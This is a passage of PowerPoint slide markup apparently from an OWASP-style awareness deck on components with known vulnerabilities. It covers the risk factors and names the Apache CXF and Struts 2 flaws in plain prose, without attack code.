                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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3" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="800568780"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2553478"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="649591">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r>
              <a:tr h="396931">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COMMON</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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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506956">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Some</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> v</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> components (e.g., framework libraries) can be identified and exploited with automated tools, expanding the threat agent pool beyond targeted attackers to include chaotic actors.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers identify a weak component through scanning or manual analysis. They customize the exploit as needed and execute the attack. It gets more difficult if the used component is deep in the application.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Many</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> applications and APIs have these issues because their development teams don’t focus on ensuring their components and libraries are up to date. In some cases, the developers don’t even know all the components they are using, never mind their versions. Component dependencies make things even worse. Tools are becoming commonly available to help detect components with known vulnerabilities.</a:t>
                      </a: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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> full range of weaknesses is possible, including injection, broken access control, XSS, etc. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The impact could range from minimal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> to complete host takeover and data compromise.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider what each vulnerability might mean for the business controlled by the affected application. It could be trivial or it could mean complete compromise.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Components almost always run with the full privilege of the application, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in any component can result in serious impact. Such flaws can be accidental (e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., coding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error) or intentional (e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor in component). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some example exploitable component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Apache CXF Authentication Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ervices framework, not to be confused with the Apache Application Server.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Struts 2 Remote Code Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications using a vulnerable version of either component are susceptible to attack as both components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable to Known Vulns?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
